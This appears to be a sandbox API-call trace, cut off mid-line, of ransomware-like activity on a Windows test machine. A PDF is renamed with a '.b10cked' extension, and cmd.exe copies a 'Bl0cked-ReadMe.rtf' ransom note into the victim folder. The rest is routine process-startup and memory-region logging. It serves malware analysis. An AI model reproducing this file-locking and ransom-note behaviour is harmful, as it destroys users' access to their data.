0x0 [0140.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", nBufferLength=0x104, lpBuffer=0x1cf3b0, lpFilePart=0x1cf148 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", lpFilePart=0x1cf148*="THCV85~1.PDF") returned 0x36 [0140.107] SetErrorMode (uMode=0x0) returned 0x1 [0140.107] SetErrorMode (uMode=0x0) returned 0x0 [0140.107] SetErrorMode (uMode=0x1) returned 0x0 [0140.107] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x1cf5b8, lpFilePart=0x1cf148 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", lpFilePart=0x1cf148*="Thcv85KW1KoWsUQP.pdf.b10cked") returned 0x46 [0140.107] SetErrorMode (uMode=0x0) returned 0x1 [0140.107] SetLastError (dwErrCode=0x0) [0140.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf.b10cked")) returned 0xffffffff [0140.107] GetLastError () returned 0x2 [0140.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x1ceac4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceac4) returned 0x200f50 [0140.107] FindNextFileW (in: hFindFile=0x200f50, lpFindFileData=0x1ceac4 | out: lpFindFileData=0x1ceac4) returned 0 [0140.108] GetLastError () returned 0x12 [0140.108] FindClose (in: hFindFile=0x200f50 | out: hFindFile=0x200f50) returned 1 [0140.109] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x211c70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x211c70) returned 0x200f50 [0140.109] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x1ced5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", lpFilePart=0x0) returned 0x46 [0140.109] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf", nBufferLength=0x104, lpBuffer=0x1ced5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf", lpFilePart=0x0) returned 0x3e [0140.109] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf")) returned 0x20 [0140.109] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf.b10cked"), dwFlags=0x3) returned 1 [0140.109] FindClose (in: hFindFile=0x200f50 | out: hFindFile=0x200f50) returned 1 [0140.109] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ced10 | out: _Buffer=" 1") returned 9 [0140.110] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.110] GetFileType (hFile=0x7) returned 0x2 [0140.771] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cec9c | out: lpMode=0x1cec9c) returned 1 [0140.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.771] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cecd0 | out: lpConsoleScreenBufferInfo=0x1cecd0) returned 1 [0140.771] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.772] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ced10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.772] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cecf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cecf4*=0x1a) returned 1 [0140.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.772] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.772] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.772] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.773] SetConsoleInputExeNameW () returned 0x1 [0140.773] GetConsoleOutputCP () returned 0x1b5 [0140.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.773] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.773] exit (_Code=0) Process: id = "172" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14988 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14989 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14990 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14991 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 14992 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14993 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14994 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14995 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14996 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 14997 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15998 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15999 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16000 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16001 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 16002 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 16003 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16004 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16005 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16006 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16007 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16008 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16009 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16010 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16011 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16012 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 16013 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16014 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16015 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16016 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16017 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16018 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16019 start_va = 0x550000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 16020 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 16021 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Thread: id = 229 os_tid = 0xdc8 [0141.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8cc | out: lpSystemTimeAsFileTime=0x26f8cc*(dwLowDateTime=0x8e55d720, dwHighDateTime=0x1d440a9)) [0141.598] GetCurrentProcessId () returned 0xdf0 [0141.599] GetCurrentThreadId () returned 0xdc8 [0141.599] GetTickCount () returned 0x2c60c [0141.599] QueryPerformanceCounter (in: lpPerformanceCount=0x26f8c4 | out: lpPerformanceCount=0x26f8c4*=19838779671) returned 1 [0141.599] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.599] __set_app_type (_Type=0x1) [0141.599] __p__fmode () returned 0x76b331f4 [0141.599] __p__commode () returned 0x76b331fc [0141.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.600] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.600] GetCurrentThreadId () returned 0xdc8 [0141.600] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdc8) returned 0x38 [0141.600] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.600] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.600] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.600] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.600] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f85c | out: phkResult=0x26f85c*=0x0) returned 0x2 [0141.601] VirtualQuery (in: lpAddress=0x26f893, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.601] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f82c, dwLength=0x1c | out: lpBuffer=0x26f82c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.601] GetConsoleOutputCP () returned 0x1b5 [0141.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.601] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.602] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.602] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.602] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.603] GetEnvironmentStringsW () returned 0x360198* [0141.603] FreeEnvironmentStringsW (penv=0x360198) returned 1 [0141.603] GetEnvironmentStringsW () returned 0x360198* [0141.603] FreeEnvironmentStringsW (penv=0x360198) returned 1 [0141.603] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7cc | out: phkResult=0x26e7cc*=0x40) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0xc0, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x0, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.603] RegCloseKey (hKey=0x40) returned 0x0 [0141.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7cc | out: phkResult=0x26e7cc*=0x40) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x40, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x1, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x0, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x9, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x4, lpData=0x26e7d8*=0x9, lpcbData=0x26e7d0*=0x4) returned 0x0 [0141.604] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7d4, lpData=0x26e7d8, lpcbData=0x26e7d0*=0x1000 | out: lpType=0x26e7d4*=0x0, lpData=0x26e7d8*=0x9, lpcbData=0x26e7d0*=0x1000) returned 0x2 [0141.604] RegCloseKey (hKey=0x40) returned 0x0 [0141.604] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.604] srand (_Seed=0x5b886370) [0141.604] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0141.604] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0141.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.605] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3618f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.605] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.605] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.605] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.605] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.605] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.605] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.605] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.605] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.605] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.605] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.605] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.605] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.605] GetEnvironmentStringsW () returned 0x3622e8* [0141.605] FreeEnvironmentStringsW (penv=0x3622e8) returned 1 [0141.605] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.605] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.606] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.606] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.606] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.606] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.606] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.606] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.606] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.606] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.606] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f598, lpFilePart=0x26f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f594*="Desktop") returned 0x18 [0141.606] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.606] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f314 | out: lpFindFileData=0x26f314) returned 0x360028 [0141.606] FindClose (in: hFindFile=0x360028 | out: hFindFile=0x360028) returned 1 [0141.606] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f314 | out: lpFindFileData=0x26f314) returned 0x360028 [0141.607] FindClose (in: hFindFile=0x360028 | out: hFindFile=0x360028) returned 1 [0141.607] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f314 | out: lpFindFileData=0x26f314) returned 0x360028 [0141.607] FindClose (in: hFindFile=0x360028 | out: hFindFile=0x360028) returned 1 [0141.607] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.607] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.607] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.607] GetEnvironmentStringsW () returned 0x362b08* [0141.607] FreeEnvironmentStringsW (penv=0x362b08) returned 1 [0141.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.608] GetConsoleOutputCP () returned 0x1b5 [0141.608] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.608] GetUserDefaultLCID () returned 0x409 [0141.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6d8, cchData=128 | out: lpLCData="0") returned 